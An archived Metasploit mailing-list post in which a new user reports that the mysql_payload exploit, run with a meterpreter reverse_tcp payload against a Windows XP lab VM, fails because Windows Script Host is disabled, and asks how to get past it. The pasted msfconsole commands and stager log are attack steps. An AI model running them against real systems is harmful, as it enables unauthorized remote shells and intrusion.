Home page logo

metasploit logo Metasploit mailing list archives

payload meet wsh failure?
From: Linan Wang <wang.linan () gmail com>
Date: Wed, 8 Jun 2011 22:17:10 +0100

Hi list,

I have played with the mysql_payload exploit for a full day but got to this
... the exploit successfully uploaded a file and defined a mysql udf, which
enabled next step payload deliver
... no matter what payload i choose, no session was created. I look into the
target machine's even log, it reported Failure Audit: Attempt to execute
Windows Script Host while it is disabled. I guess there is advanced someway
to manipulate the payload. (yes, it's my 1 day with msf)

msfconsole log:
use windows/mysql/mysql_payload
set PASSWORD 123456
set PAYLOAD windows/meterpreter/reverse_tcp
[*] Started reverse handler on
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] sys_exec() already available, using that (override with
[*] Command Stager progress -   1.47% done (1499/102246 bytes)
[*] Command Stager progress -   2.93% done (2998/102246 bytes)
[*] Command Stager progress -  98.19% done (100400/102246 bytes)
[*] Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
the target is a clean windows xp vm without any anti-virus installed.

any suggestion? thx


  By Date           By Thread  

Current thread:
  • payload meet wsh failure? Linan Wang (Jun 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]